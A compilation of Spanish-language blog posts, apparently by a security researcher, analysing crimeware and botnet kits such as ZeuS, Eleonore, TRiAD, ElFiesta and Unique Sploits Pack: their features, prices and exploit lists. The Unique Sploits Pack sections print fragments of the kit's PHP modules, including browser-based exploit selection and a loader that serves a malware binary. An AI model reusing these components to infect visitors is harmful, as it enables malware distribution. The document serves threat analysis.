A diferencia de su antecesor, la versión 1.0.4, no trae incorporado por defecto la explotación de vulnerabilidades en Sun Java JRE/JDK , pero puede ser solicitado. Además se agregó un exploit para MS DirectShow . El paquete se compone de los siguientes exploits preinstalados:

• MS06-014 Internet Explorer (MDAC) Remote Code Execution Exploit • PDF util.printf() • PDF collab.collectEmailInfo() • PDF collab.getIcon() • Flash 9 • MS DirectShow

Algunas características a destacar de la aplicación web (maliciosa) es el bloque de reacceso a la página, es decir, sólo se accede a la página que posee el exploit una sola vez, luego de eso la bloquea; la base de datos se maneja con MySQL, la optimización que ofrece para operar con grandes flujos de información es interesante, instalación sumamente sencilla, permite incorporar técnicas anti-análisis, entre otras.

Con respecto al panel de administración (dicho sea de paso sencillo y minimalista), a través de este se realiza un seguimiento detallado a nivel estadístico sobre el tipo y versión de navegadores explotados, los países donde se poseen zombis, el tipo de tráfico, entre otros. Además, algo que diferencia a este crimeware, ya que no todos lo poseen, es un sistema de estadísticas gráfico, mediante el cual se generan tortas con información relevante sobre los aspectos antes mencionados. En la captura se ve un ejemplo.

Este sistema estadístico y recolección de información es lo que llama la atención, en general, en todos el crimeware de este estilo, ya que independientemente de la perspectiva que la analicemos, no es más que la obtención de información elaborada, lo que en otros ambientes se conoce como Inteligencia.

44

Esto da lugar a comprender y a comenzar a tener en cuenta en su justa medida, que las botnets, como las conocemos hoy en día, representan un grave problema de seguridad a nivel global, no solo por la propagación de malware sino que también por que son empleadas para llevar a cabo otras maniobras de ataque donde los objetivos van más allá de los usuarios hogareños.

TRiAD Botnet III. Administración remota de zombis multiplataforma TRiAD es un aplicativo web diseñado para controlar y administrar botnets a través de plataformas GNU/Linux y MS Windows por intermedio del protocolo http y del cual ya hemos hablado recientemente. Forma parte de un proyecto aún más ambicioso por parte de su autor (quien se hace llamar “ cross ”), denominado Hybrid Remote Administration System y del cual hablaremos en poco tiempo ;P

En esta oportunidad, se trata de la versión 3 de TRiAD Botnet . Esta aplicación web que todavía esta en “pañales” pero que a pesar de ello se encuentra en constante desarrollo y que a partir de la versión 2 se convirtió en un crimeware multiplataforma.

Su nombre completo es en realidad TRiAD HTTP Control System v0.3 .

Esta última versión del crimeware posee leves diferencias (mejoras diría el creador) con respecto a su antecesor. A primera vista, resalta en su nueva interfaz, algo que podríamos decir, caracteriza al aplicativo.

45

Al igual que los anteriores, se encuentra escrito en C++ y compilado con GCC.

Si bien no posee funcionalidades estadísticas como si encontramos en aplicativos crimeware más complejos, cuenta con una serie de opciones que lo hace un peligro latente. Por el momento, sus funcionalidades son:

En sistemas GNU/Linux:

• Syn Flood con source IP spoofing : [SynStorm]-[Host]-[Port]-[Nr of Packets]-[Delay] • Small HTTP Server : [HTTP Server]-[Port]-[Time(minutes)] • Bind Shell : [Bind Shell]-[Port]-[Allowed IP Address]

Mientras que la versión para plataformas Windows cuenta con:

• UDP Flood : [Reverse Shell]-[Host]-[Port] • Small Proxy Server : [UdpStorm]-[Target IP]-[Target Port]-[Nr of Packets]-[Delay] • Reverse Shell : [Proxy Server]-[Port]-[Time(minutes)]

Independientemente de la plataforma, ambas poseen en común la posibilidad de:

• Sleep : Modo “dormido” • Reboot remote machine : Reiniciar el equipo de forma remota • Shutdown remote machine : Apagar el equipo de forma remota • Delete bot from remote machine : Eliminar la bot de forma remota

46

Mediante una reciente actualización, por ahora, sólo para la versión que corre en GNU/Linux, se establece la posibilidad de generar el archivo de configuración mediante una GUI, de esta forma, el proceso es mucho más sencillo.

El archivo de configuración generado luego se compilará para crear la bot obteniendo así un nuevo crimeware a través de unos simples pasos.

Sin embargo, esto genera una contra que tiene que ver con una cuestión de optimización ya que al momento de actualizar los bots, se tendría que hacer de forma individual, lo cual es molesto para un botmaster avanzado.

El crimeware de este estilo ha generado una tendencia difícil de frenar, que marca un antes y un después en torno al control y administración de botnets que supone un mayor esfuerzo por parte de las comunidades de seguridad en la lucha contra el ciber-crimen organizado de las cuales forman parte en el estado actual de las actividades delictivas cometidas a través de Internet.

Eleonore Exploits Pack. Nuevo crimeware In-the-Wild El negocio que representa el crimeware dentro del mundo clandestino de comercialización de aplicativos web juega un rol importante en el plan de negocio de los desarrolladores rusos que dedican gran parte del tiempo en crear amenazas de este estilo.

Son varios los paquetes similares que hemos expuesto durante la corta existencia de este blog y cada día son más los que surgen con el ánimo de acrecentar la economía de sus autores. En este caso, se encuentra en “libertad” una nueva versión de Eleonore Exp (Abreviación de Eleonore Exploits Pack ) que el autor ha presentado bajo la leyenda “ Hello! I present new actual Russian exploits pack "Eleonore Exp v1.2 ”.

Esta nueva versión del paquete está concebida, en primera instancia, para explotar las siguientes vulnerabilidades:

• MDAC • MS009-02 • Telnet - Opera • Font tags - FireFox • PDF collab.getIcon • PDF Util.Printf • PDF collab.collectEmailInfo • DirectX DirectShow • Spreadsheet

El proceso de instalación es muy sencillo y se realiza a través del archivo install.php , la configuración se especifica en el archivo config.php y el malware, por defecto, se llama load.exe (en caso de cambiar el nombre, la modificación debe ser reflejada en el archivo de configuración).

47

En la siguiente captura se aprecia la pantalla de estadísticas desde la cual se desprenden datos interesantes relacionados al total de sistemas operativos atacados, los navegadores mediante los cuales se explotó una vulnerabilidad junto a sus respectivas versiones, cantidad de zombis discriminados por países y los exploits utilizados.

En cuanto a los precios, este crimeware se comercializa a un costo de USD 700 y este valor corresponde sólo al Kit sin componentes extras como un Crypter (cuyo valor agregado es de USD 50 ). Por defecto, viene vinculado a un dominio; es decir, se compra y se usa , directamente, sin más trámites.

Sin embargo, en caso que el comprador prefiera desvincular el paquete de cualquiera de los dominios con los cuales se vende, puede hacerlo pero abonando la suma de USD 1500 por el Kit completo. Por otro lado, también se ofrece un combo mediante el cual los tres primeros compradores adquieren Eleonore Exp v1.2 más el crypter por un valor de USD 600 .

En cuanto a las versiones anteriores, los costos son:

• Eleonore Exp v1.0 = USD 300 (en un principio costaba USD 599 ): no posee DirectX DirectShow y Spreadsheet • Eleonore Exp v1.1 = USD 500 : no posee Spreadsheet

Como es habitual, los botmasters que poseen versiones anteriores pueden actualizar los nuevos exploits y la funcionalidad de cargar un malware a través del panel de administración de manera local (desde su computadora) o de forma remota (desde una zombi).

Evidentemente, los servicios fraudulentos encuadrados dentro del acrónimo CaaS , Crimeware as a Service , aumentan de manera exponencial conforme pasa el tiempo en un mundo clandestino de desarrollo y comercialización donde intervienen diferentes actores siendo el creador del crimeware y los botmaster (los que generalmente compran o alquilan en primera instancia el aplicativo web), los protagonistas más relevantes. 48

TRiAD Botnet II. Administración remota de zombis multiplataforma Hace unos días mencionábamos la creación de una aplicación web creada para plataformas GNU/Linux que permite controlar y administrar botnets a través del protocolo http llamada TRiAD Botnet.

A pesar de su corto periodo de vida, la primera versión se lanzó el 18 de febrero de 2009, ya existen evoluciones de este crimeware (exactamente dos más) pensadas para operar tanto en sistemas operativos GNU/Linux como en Windows. Es decir, el aplicativo evolucionó y se transformó en un crimeware multiplataforma.

La captura que se presenta a continuación representa a la segunda versión. Como se aprecia, sigue manteniendo la idea de una aplicación minimalista, sin demasiadas exigencias y con un fondo “vistoso”.

Si bien sigue manteniendo la posibilidad de realizar ataques de Denegación de Servicio Distribuida (DDoS), ReverseShell y BindShell , posee nuevas características como: Delete Bot from remote machine (Eliminar la bot de la máquina remota), Shutdown Remote Machine (Apagar el equipo de forma remota) y Reboot Remote Machine (Reiniciar el equipo remotamente).

La primera de las opciones, quizás esta concebida con el ánimo de ofrecer un mecanismo de auto-defensa eliminado el control de la zombi en caso de incidente. En cuanto a las otras dos opciones, parecerían haber sido creadas más bien con la intención de “diversión” contra el equipo víctima.

Aunque no representa una amenaza compleja, como si lo son otros crimeware como ZeuS, ElFiesta, Unique Sploits Pack o YES Sploit System, y por sus funcionalidades simples se asemeja más a un backdoor en PHP, no deja de ser una aplicación web que puede convertirse en muy peligrosa debido a un agravante: es gratuita y de código libre, lo que significa que puede ir evolucionando conforme a las intenciones maliciosas de quien o quienes decidan “maquillar” su código fuente.

49

TRiAD Botnet. Administración remota de zombis en Linux La posibilidad de administrar botnets a través del protocolo http parecería ser un requisito fundamental para los desarrolladores de estos aplicativos web que colaboran activamente con el crimeware actual.

En este sentido, otra de las alternativas se llama TRiAD BotNet Control System , un sistema de control remoto para plataformas Linux . Si bien este aplicativo web posee un tiempo de vida todavía prematuro (su primer lanzamiento data del 18 de febrero de 2009), ya se encuentran disponibles tres versiones que poseen entre sí algunas diferencias interesantes.

Pero haciendo un paréntesis por el momento sobre los aspectos técnicos que posee TRiAD BotNet , uno de los factores más llamativos que particularmente presenta esta aplicación (y en general las de su estilo) esta constituido por lo vistoso del diseño, donde el pensamiento que se esconde detrás de ello parecería ser el de marcar “el estilo” del autor.

Incluso, el mismo criterio parece estar presente también en aplicativos crimeware más complejos, en términos de funcionalidades y opciones propuestas, que el mencionado. Caso ZeuS por ejemplo.

Por otro lado, otra característica que se percibe en el desarrollo actual de crimeware de este estilo es el mayor énfasis en optimizar los procesos involucrados en la implementación de las botnets, el control de los zombis y su administración. Donde, sin perder esa primera característica planteada (el diseño) que hace del aplicativo más “amigable”, también presenta sencillez junto a un estilo minimalista.

Sin embargo, sea como sea en términos de diseño, en cuanto al tipo de funcionalidades que presenten o el costo de su adquisición; las botnets y el ejército de computadoras zombis que el botmaster tenga bajo su mando constituyen un potencial peligro y un centro de ataque vía web difícil de frenar en estos tiempos.

En este caso, se trata de la primera versión de una familia de aplicativos web, TRiAD BotNet (escritos en C), diseñados como sistemas de control de botnets que posee un hermano mayor llamado Hybrid , con la particularidad de estar diseñados para controlar zombis en distribuciones Linux.

Aunque esta versión de TRiAD corre solamente en plataformas Linux, sus posteriores versiones son multiplataformas (Linux y Windows). Permite ejecutar sólo tres de las funciones básicas de administración de cualquier botnet: ejecución de ataques DDoS , ejecución de una shell y apertura de puertos ( BindShell ), y aviso de conexión de una zombi ( ReverseShell ).

50

Desde el punto de vista estructural, el módulo de ataque de Denegación de Servicio Distribuida se concentra en un archivo llamado dos.php cuya información se guarda en el archivo dos.txt .

if ($action){ $file = fopen("dos.txt","w+"); fwrite($file,$cmd); fseek($file,0); $line = fread($file,100);echo "Command: $line "; fclose($file);

En lo que respecta a la BindShell , a través de sólo seis comandos se establece lo necesario para ejecutar una shell y dejar una puerta abierta disponible para el botmaster.

Estos comandos se visualizan en la captura que representa el módulo en cuestión, que toma la información desde el archivo cmd.php reflejando el resultado en cmd.txt .

if ($action){ $file = fopen("cmd.txt","w+"); fwrite($file,$cmd); fseek($file,0); $line = fread($file,100); echo "Command: $line "; 0 fclose($file);

51

El módulo ReverseShell informa cada vez que una zombi es reclutada y cada vez que establece conexión a Internet. Esta información es almacenada en una pequeña tabla que muestra cantidad de zombis activos, dirección IP del host objeto de ataque y el comando ejecutado.

$machines = new Online(); if ($machines->count() == 1) { echo "--> " . $machines->count() . " bot "; } else { echo "--> " . $machines->count() . " bots "; }

$ddos = fopen("dos.txt","r"); $line = fread($ddos,100); echo " $line "; fclose($ddos);

$plik = fopen("cmd.txt","r"); $linia = fread($plik,100); echo " $linia "; fclose($plik);

Las botnets constituyen un grave problema para la seguridad de cualquier entorno de información conectado a Internet, y el desarrollo de aplicativos crimeware es cada vez más alto. Incluso, como en este caso donde el código fuente es libre, existe un agravante: cualquier persona con los conocimientos necesarios pueda manipular el código y adaptar/agregar funcionalidad a la botnet.

Aún así, aunque el desarrollo de crimeware no represente un negocio para el creador de estos aplicativos, no deja de colaborar en una industria con objetivos maliciosos ampliando el abanico de alternativas destinadas a engrosas otros negocios relacionados.

52

Especial!! ZeuS Botnet for Dummies Luego de abordar con bastante énfasis las actividades realizadas por una de las botnets más activas del momento, ZeuS, veamos una descripción más detallada de su capacidad delictiva.

Si hablamos de malware y botnets, sin lugar a dudas ZeuS posee una particular ventaja debido a la cantidad de zombis que forman parte de su plantel. ZeuS está diseñado para robar cualquier tipo de información que se encuentre depositada en los equipos víctimas de forma remota, y realizar otros ataques también orientados al robo de información como phishing.

Por tal motivo, podríamos decir que ZeuS es un spyware, aunque también tiene capacidades propias de otros tipos de códigos maliciosos como backdoors, troyanos y virus. Sin embargo, su autor menciona en el manual de instalación que no le agrada llamar de ninguna de esas formas a este crimeware , sino que prefiere referirse a la misma como un " software bot ".

A pesar de la cara externa que conocemos de ZeuS (su interfaz web de administración y control de zombis), presenta ciertas características que constantemente evolucionan y se profesionalizan logrando una mayor flexibilidad y capacidad de adaptación para garantizar su funcionamiento sobre diferentes versiones de Windows. Esto hace de ZeuS una amenaza muy peligrosa y latente para cualquier sistema de información.

En este sentido, ZeuS también asegura su rendimiento “trabajando” en el nivel de privilegios 3 (donde corren las aplicaciones) del sistema operativo evitando así incompatibilidades entre la aplicación y los dispositivos del equipo (que funcionan en niveles más bajos). Aunque parezca un dato irrelevante, esto le permite conseguir una mayor flexibilidad y por ende un mayor rendimiento al momento de realizar las actividades fraudulentas y delictivas para las cuales fue concebido.

La última versión de ZeuS se encuentra escrita con la versión 9 del lenguaje C++, y entre las funcionalidades que posee este aplicativo web (malicioso), podemos mencionar:

• Monitorea el tráfico de red (sniffer) del protocolo TCP. • Intercepta las conexiones FTP y POP3 de cualquier puerto. • Intercepta las solicitudes http y HTTPS de todas las aplicaciones que funcionen con la librería wininet.dll (por ejemplo IE). Esto desmitifica el mito en cuanto a que ZeuS utiliza BHO para interceptar las solicitudes a través de IE. • Funciones de servidor (socks4/4a/5). • Backconnect para todos los servicios del equipo infectado ((RDP, Socks, FTP, etc.). • Obtiene capturas de pantallas en tiempo real. • Capacidad de realizar ataques de phishing. • Incorpora mecanismos anti-análisis. • Constructor interno del troyano que disemina y archivo de configuración. • Cifrado polimórfico. 53

Otro dato técnico importante es que toda la comunicación realizada por ZeuS es a través de un algoritmo de cifrado simétrico (RC4).

El servidor es el corazón de ZeuS, y de cualquier botnet, ya que es quien permite obtener todos los registros de los equipos infectados que forman parte de la botnet y ejecutar comandos de manera remota.

Por otro lado, muchas botnets utilizan servidores virtuales para realizar sus maniobras delictivas. Sin embargo, esto juega en contra de la botnet cuando es muy grande, caso ZeuS, ya que por lo general, los servidores virtuales no poseen demasiados recursos, por lo tanto, es habitual que los botmaster utilicen servidores dedicados para alojar la bot. Esto es un dato importante a tener en cuenta durante la faz de investigación.

En consecuencia, y como toda aplicación, necesita un mínimo de recursos para poder correr de manera satisfactoria, en el caso de esta botnet, los requisitos son tan sólo disponer de 2GB de memoria RAM y 2x de frecuencia de CPU a 2 GHz. Como vemos, los requisitos mínimos no son para nada un limitante VIP. Cualquier usuario puede implementar ZeuS, incluso, sin contar con esos requisitos mínimos.

Además, se supone que el equipo donde se ejecuta es un servidor HTTP con PHP (lenguaje en el que se suele desarrollar estos crimeware), y MySQL (para crear la base de datos con la información estadística que se desprende de su actividad). Otro requisito es Zend Optimizer, necesario para optimizar y proteger los scripts.

Con respecto a las actualizaciones, ZeuS también las tiene, pueden ser “pisadas” por versiones más recientes sin demasiados esfuerzos. 54

Durante el último semestre se han liberado cinco versiones (a razón de una cada aprox. 35 días) con corrección de errores, cambios y nuevas características, sin contar las versiones con arreglos menores.

Luego de mirar el diagrama, muchos se preguntaran qué significa el número de cada versión. A modo didáctico podríamos decir que si tenemos la versión " A.B.C.D"…

A significa un cambio completo del paquete crimeware. B representa cambios importantes que causan incompatibilidad total o parcial con versiones anteriores. C especifica corrección de errores, funcionalidades incorporadas, mejoras, etc. D es el número de refuds (cambios) para la versión actual.

Esto es sólo un pantallazo general de lo que puede y representa ZeuS en cuanto a las capacidades y maniobras que posee dentro de un ambiente delictivo donde los aplicativos crimeware son los actores principales.

ElFiesta. Reclutamiento zombi a través de múltiples amenazas ElFiesta es otro integrante de la familia de aplicaciones web, creada por desarrolladores rusos y puesta a disposición de los ciber-delincuentes, que permiten no sólo controlar y administrar cada una de las computadoras infectadas que forman parte de su red (zombis) sino que también ejecutar ataques vía web a través de diferentes técnicas que involucran la explotación de vulnerabilidades.

Uno de los módulos de ElFiesta posee como objetivo precisamente la propagación/infección a través de archivos PDF ( Portable Document Format ) que buscan vulnerabilidades en algunas versiones de Adobe Acrobat Reader.

En este caso, el archivo descargado se llama 4573.pdf (MD5: b7b7d52a205e950adf4795c14c7f7178), cuyo nombre es aleatorio, posee una tasa de detección del casi el 50%, por ende, una tasa de infección bastante importante por el momento.

55

Como se mencionó anteriormente, explota una vulnerabilidad (la CVE-2007-5659 ) que provoca un múltiple Desbordamiento de Búfer a través del archivo pdf previamente manipulado de manera maliciosa incrustando en el mismo un script en JavaScript que descarga y ejecuta un binario llamado load.exe (MD5: 5ee26f43139a2cdb3a79a835574285a0) desde /load.php?id=1118&spl=3.

Otro de los módulos que incorpora ElFiesta centra el ataque en un método scripting sometido a una técnica de ofuscación.

Realizando un análisis más profundo del caso, nos encontramos con una versión de ElFiesta recién implementada. En la siguiente captura se aprecia que la información estadística corresponde a nuestros datos.

Estos métodos son comunes a la mayoría de aplicativos crimeware de este estilo; sin embargo, apreciamos un detalle más que interesante: el dominio utilizado corresponde a un conocido scareware llamado XP Police Antivirus.

En consecuencia, la primera pregunta que viene a la mente es: XP Police Antivirus ¿colabora con el reclutamiento zombi de ElFiesta?

56

Mirando de cerca la estructura de Unique Sploits Pack Unique Sploits Pack es un paquete crimeware del cual en este Blog dimos cuenta en varias oportunidades.

Este Kit, de origen ruso, se comercializa en el mercado a un costo de USD 750 la versión full que incorpora una aplicación de cifrado y el “beneficio” de acceder a las actualizaciones, siendo la versión actual de este crimeware la 1.5. Incluso, hasta hace poco, su comercialización se realizaba vía web a través de un sitio llamado unpack.ws (actualmente inactivo), donde era la versión 1.4 la comercializada en ese entonces.

A pesar del valor que actualmente posee Unique Sploits Pack, en algunos foros es posible encontrar un esquema de comercialización a través de ICQ, incluso, conseguir alguno de los combos con varios Kits de este estilo a un precio que, para los costos que manejan los desarrolladores de crimeware, puede representar una verdadera ganga.

Esta información nos da una idea global de cómo es el esquema de venta de estos, cada vez más comunes, aplicativos web que sientan las bases del comercio clandestino de crimeware.

Pero dejemos por un momento a un costado todo lo referido a la industria que se encuentra detrás y miremos un poco más de cerca cómo se encuentra estructurado Unique Sploits Pack.

Si bien este paquete no es muy diferente de otros, cada uno de los módulos que lo conforman corresponde a un archivo PHP, de los cuales, quizás se destaca el que permite diseminar malware empleando una estrategia de Ingeniería Social visual similar a las utilizadas por el scareware:

• Módulo config.php : posee la configuración que indica desde qué URL y qué malware se intentará diseminar. En este módulo también se configura el esquema de autenticación que tendrá la base de datos y el login al panel de control/administración.

// ENLACE AL MODULO load.php $url='http://XX.XX.XX.XX/XX/load.php'; // ENLACE AL MODULO pdf.php $pdf='http://XX.XX.XX.XX/XX/pdf.php'; 57

// BINARIO define('EXE', '1.exe'); define('Unique', 'go-go-go'); // don't edit // ACCESO A MySQL $db_host=''; $db_name=''; $db_user=''; $db_pass=''; // ACCESO AL PANEL DE CONTROL $cp_url='admcp.php'; $cp_user=''; $cp_pass='913f8cfc77c2c974cc3a838cde8c7e6b';

• Módulo _install.php : posee los scripts necesarios para crear y configurar las tablas para la base de datos.

include ("cfg/config.php"); if (!($c = mysql_connect($db_host, $db_user, $db_pass))) { die("Check host, user or password (./cfg/config.php)"); if (!mysql_select_db($db_name,$c)) { die("Check DB name (./cfg/config.php)"); if (!mysql_query("DROP TABLE IF EXISTS statistic ;",$c)) die("Check permission for user '".$db_user."'"); if (!mysql_query("CREATE TABLE statistic int(10) NOT NULL auto_increment, varchar(15) default NULL, varchar(30) default NULL, varchar(30) default NULL, country varchar(2) default '--', int(1) NOT NULL default '0', refer varchar(300) NOT NULL, datetime default 'XXXX-XX-XX 00:00:00', PRIMARY KEY ( ) ENGINE=MyISAM DEFAULT CHARSET=cp1251 AUTO_INCREMENT=1;",$c)) die("Check permission for user '".$db_user."'"); die(" //SIGUE

• Módulo options.php: identifica el navegador, el sistema operativo y el país; este último, en base al módulo GeoIP. También codifica la función Unicode del JS y especifica la página de error 404.

• Módulo index.php: detecta la presencia de _install.php y lo ejecuta, además de verificar que no se realice la instalación a través de la misma dirección IP. Si detecta la misma dirección IP, aborta el proceso y ejecuta el módulo options.php mostrando error 404.

error_reporting(0); if (file_exists("install.php")) { include ("install.php"); include'cfg/options.php'; include'cfg/config.php'; $ip = $_SERVER['REMOTE_ADDR']; mysql_connect($db_host, $db_user, $db_pass); mysql_select_db($db_name); $q = mysql_query("select ip from statistic where ip='$ip'"); $n = mysql_num_rows($q); @mysql_free_result($q); if ($n != 0) exit($page404); $country = detect_country($ip); $br = browser(); 58

$os = os(); @$purl = $_SERVER['HTTP_REFERER']; $ref=parse_url($purl); @$ref=$ref['host']; $q = mysql_query("insert into statistic (date, ip, os, br, country, refer) values ('".date("Y-m-d H:i:s", time())."', '".$ip."', '".$os."', '".$br."', '".$country."','".$ref."')"); @mysql_free_result($q); include ("sploits.php");

• Módulo sploits.php : el objetivo principal del módulo es configurar los exploits que se van a ejecutar; pero también chequea que exista el nombre "Unique". Si no lo encuentra muestra error 404 ejecutando el módulo options.php.

if (!defined('Unique')) { die ($page404); if (eregi("(opera)[ /]([0-9]{1,2}).([0-9]{1,3})",$br,$index)){ if (($index[2]=="9") && ($index[3]>="51") && ($index[3]<="61")) { // include_once(_NEW_SPLOIT_); // echo "DEL ME!!! NEW SPLOIT WORK"; // if (($index[2]=="9") && ($index[3]>"21")) { include_once("./sploit/op9.php"); if (eregi("firefox",$br)){ include_once("./sploit/ff.php"); if (eregi("IE 7",$br)){ include_once("./sploit/ie7.php"); if (eregi("IE 6",$br)){ include_once("./sploit/ie.php"); if (eregi("IE 5",$br)){ include_once("./sploit/ie.php"); if (eregi("IE 4",$br)){ include_once("./sploit/ie.php");

• Módulo admcp.php: define el acceso a la aplicación web a través de un esquema de autenticación, solicitando nombre de usuario y contraseña, previamente definidos en el módulo config.php.

• Módulo geoip.php: identifica el país del sistema zombi a través de un ID.

"IT" => 108, "JM" => 109, "JO" => 110, "JP" => 111, "KE" => 112, "KG" => 113, "KH" => 114, "KI" => 115, "KM" => 116, "KN" => 117, "KP" => 118, "KR" => 119, "KW" => 120, "KY" => 121, "KZ" => 122, "LA" => 123, "LB" => 124, "LC" => 125, "LI" => 126, "LK" => 127, "LR" => 128, "LS" => 129, "LT" => 130, "LU" => 131, "LV" => 132, "LY" => 133, "MA" => 134, "MC" => 135, "MD" => 136, "MG" => 137,"MH" => 138, "MK" => 139, "ML" => 140, "MM" => 141, "MN" => 142, "MO" => 143, "MP" => 144, "MQ" => 145, "MR" => 146, "MS" => 147, "MT" => 148, "MU" => 149, //SIGUE HASTA EL 250

• Módulo load.php : actualiza la columna "good" de la base de datos y ejecuta los scripts según lo definido en el archivo de configuración.

error_reporting(0); include ("cfg/config.php"); $fsize = filesize(EXE); $dd=fopen(EXE, "r"); $ss=fread($dd,$fsize); fclose ($dd); header("Accept-Ranges: bytes"); header("Content-Length: ".$fsize.""); header("Content-Disposition: inline; filename=".EXE); header("Content-Type: application/octet-stream"); echo ($ss); $ip = $_SERVER['REMOTE_ADDR']; mysql_connect($db_host, $db_user, $db_pass); 59

mysql_select_db($db_name); $q = mysql_query("update statistic set good=1 where ip='".$ip."'"); @mysql_free_result($q);

• Modulo pdf.php : contienen un exploit para la vulnerabilidad mencionada en CVE-2008-2992 para Adober Reader que intenta explotar en el sistema a través de un archivo PDF. El código php de este módulo se encuentra sometido a un proceso de ofuscación

hAvBwcGxpY2EG0S8EsANhAEEFOmRpZSiAABYlPz4=")); ?>

• Módulo vparivatel.php : ejecuta una metodología de Ingeniería Social cuyos mensajes pueden ser completamente personalizada para ganar la confianza de la víctima.

• Módulo mod_vparivatel.php : contiene la configuración del módulo vparivatel.php .

En relación directa con los exploits que incorpora por defecto el aplicativo, ellos son:

• MDAC para IE 6 • PDF exploit para IE 7, Opera y Firefox • PDF exploit para Adobe Acrobat 9 • PDF Doble. Descarga de manera simultánea dos exploits en PDF • MS Office Snapshot para IE 6 y 7 • IE 7 XML SPL • Firefox Embed • IE 7 Uninitialized Memory Corruption Exploit. Nuevo exploit incorporado en la v1.5 de USP • SPL Amaya 11 • Foxit Reader 3.0. PDF Buffer Overflow Exploit (Universal) para todos los navegadores

Como vemos, la estructura de Unique Sploits Pack (que repito, no es muy diferente a otros crimeware de este estilo) es bastante compleja y engloba todo un conjunto de scripts maliciosos destinados a transformar en zombis, de una forma u otra, cuantos sistemas puedan.

Fusión. Un concepto adoptado por el crimeware actual Desde una perspectiva general, podríamos decir que la fusión consiste en la reunión, o unión, de dos o más componentes en un mismo entorno. En tal sentido, este es el concepto que parece adoptar el crimeware actual a través de dos de los Kits de administración y control de zombis vía web más activos como lo son ZeuS y ElFiesta.

60

El primero de ellos, ZeuS , cuyo panel de autenticación se ve en la imagen, posee aplicado el template ZeuS Carding World, y el segundo algunos datos estadísticos como tipo y número de sistemas operativos infectados, países en donde se encuentran las zombis y los navegadores que poseen vulnerabilidades explotadas, en este caso, por ElFiesta.

Como podemos apreciar en la captura, se han fusionado ambos paquetes en un mismo entorno; aparentemente, en un esfuerzo que busca unificar las ideas maliciosas , los intereses económicos y la potencialidad de ambos para generar un mayor poder de ataques distribuidos.

Aunque quizás esta acción parezca un tanto trivial, la verdad es que el crimeware de este estilo comparte, por demás está decir, los mismos objetivos; transformándolos en "armas" altamente compatibles entre sí.

En alguna otra oportunidad recuerdo haber encontrado una fusión entre otros dos paquetes crimeware que también se encuentran muy activos y con altos porcentajes de infección: Unique Sploits Pack y YES Exploit System.

Por lo que quizás, esta estrategia se convierta en tendencia donde diferentes actores, representados todos por Kits de administración centralizada y remota vía web, interactúen entre sí para alcanzar un mayor volumen de zombis, que permita a los atacantes un mayor grado de poder distribuido.

Botnet. Securización en la nueva versión de ZeuS Hace pocos días, una nueva versión de ZeuS (también conocido como Zbot , Wsnpoem , Ntos o Prg ) se encuentra dando vueltas por la gran nube. Esta nueva versión incorpora una serie de funcionalidades de las cuales se destaca la posibilidad de propagar la amenaza explotando uno de los vectores de infección más utilizados como lo es el correo electrónico.

Sin embargo, quizás la novedad más interesante radica en asegurar su estructura a través de la incorporación de una nueva capa de seguridad implementada durante el proceso de autenticación a su panel de administración y control.

El proceso de autenticación en versiones anteriores, se encuentra compuesto por tres campos: el de nombre de usuario, el de password y otro que establece el idioma con el cual se visualizará el crimeware , ofreciendo dos posibilidades: inglés y ruso (este último, la lengua natal del creador del paquete).

La nueva versión, no sólo posee las opciones de autenticación antes mencionadas sino que incorpora un nuevo campo que ofrece mayor seguridad contra el intento de "cracking de contraseña".

61

La incorporación de este nuevo cambio no es el único. También se ha optimizado el código de ZeuS y modificado levemente la visualización de sus diferentes módulos, quedando la estructura de configuración de la siguiente manera:

• /install > carpeta donde se aloja el instalador • /system > carpeta que aloja el sistema de archivos • /theme > el diseño con el que se visualizará ZeuS • cp.php > panel de control • gate.php > backdoreo de la bot • index.php > previene el listado de archivos • /system/config.php > archivo de configuración • /system/fsarc.php > script que llama a un archivo externo

La apariencia de las versiones anteriores del panel de instalación, como se ve en la captura, presenta cinco secciones: Root login , MySQL server , MySQL tables , Local paths y Options .

La nueva versión, optimizada, presenta cuatro secciones: Root user (datos de autenticación, equivalente a Root login), MySQL server (información de acceso a la base de datos), Local folders (archivo de registro sobre las acciones de ZeuS) y Options (donde se incorpora por defecto la opción de cifrado).

Otra de las cosas "interesantes" que incorpora esta versión del paquete, es un módulo que permite agregar scripts.

62

Esto supone un campo de acción mucho más amplio, ya que es posible agregar la cantidad y variedad de script que el botmaster desee.

Como podemos apreciar, el crimeware sigue evolucionando a través de aplicativos maliciosos, y ZeuS es una prueba fiel donde el “profesionalismo” de los ciber-delincuentes dedicados a mantener el negocio oscuro que representa el malware sigue escalando posiciones dentro del mercado delictivo.

YES Exploit System. Manipulando la seguridad del atacante Cualquier capa de seguridad que implementemos en un entorno de información busca proteger nuestros activos de potenciales acciones hostiles y nocivas, de las cuales los códigos maliciosos representan uno de los peligros más importantes contra los cuales se orientan e intentan proteger esos esquemas de seguridad.

En ese sentido, los aplicativos crimeware desarrollados para propagar diferentes amenazas y formar botnets (p.e. ZeuS, Unique, ElFiesta, YES Exploit, entre tantos otros) donde luego cada nodo infectado (zombi) es administrado vía web a través de un panel de control, están marcando una tendencia maliciosamente difícil de desprender de Internet.

Sin embargo, es muy ameno ver cómo esas medidas de protección que tanto buscamos a través de diferentes esquemas, en muchos casos, tampoco se tienen en cuenta del lado del crimeware :D dejando abierta la puerta del "parque" para que muchos nos podamos "divertir" al aprovechar sus debilidades.

Y esto no resulta tan ilógico si tenemos en cuenta que se trata de programas, de código, que como cualquier otro, siempre se encuentran propensos a diversos fallos de programación, malas configuraciones o incluso configuraciones por defecto.

63

Es así que la falta de seguridad le jugó en contra a un ejemplar de un conocido y muy activo Kit de administración y control vía web llamado YES Exploit System...

... que luego de sortear su esquema de autenticación se pudo acceder a información detallada de cada nodo que forma parte de la botnet que se administra por intermedio del crimeware.

En consecuencia, quien manipula una importante cantidad de computadoras, terminó siendo manipulado :-)

Sin embargo, resulta una buena oportunidad para ver datos estadísticos que almacena el aplicativo malicioso. Entre ellos: 64

• Navegadores y sus respectivas versiones en los cuales se explotaron vulnerabilidades • Diferentes plataformas vulneradas • Equipos controlados • País de origen de cada nodo infectado

Además de otra información relevante para que el atacante sepa que tipo de exploit deberá utilizar en relación a la tecnología que más se utiliza (IE 7 y Windows XP).

Sin embargo, también observamos que existen equipos controlados con plataformas Linux y Mac OS X. Si bien ambas plataformas no poseen la misma cantidad de víctimas como en el caso de las plataformas Microsoft, lentamente marca una tendencia sobre códigos maliciosos desarrollados para estas plataformas.

65

Unique Sploits Pack. Manipulando la seguridad del atacante II Unique Sploits Pack es otra de las alternativas que ofrece el submundo clandestino de la venta de crimeware de origen ruso.

